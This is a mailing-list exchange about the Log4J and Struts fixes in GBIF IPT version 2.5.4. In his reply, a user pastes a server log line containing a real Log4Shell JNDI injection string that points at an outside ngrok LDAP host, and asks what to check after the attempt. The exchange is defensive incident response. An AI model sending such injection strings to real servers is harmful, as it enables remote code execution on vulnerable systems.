Hi Matthew,
As we've several hosted IPTs I upgraded immediately but after checking the logs it looks like it wasn't fast enough:
logging% bzgrep 'jndi' http-access.log.*|grep 'ipt' http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq"
Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed something suspicious.. but is there anything that I should check for specificaly?
Thanks, Julien
On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J[2] libraries.
According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed.
All users are highly encouraged to upgrade to this version as soon as possible.
As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic...
Best regards,
Matthew
IPT mailing list IPT@lists.gbif.org https://lists.gbif.org/mailman/listinfo/ipt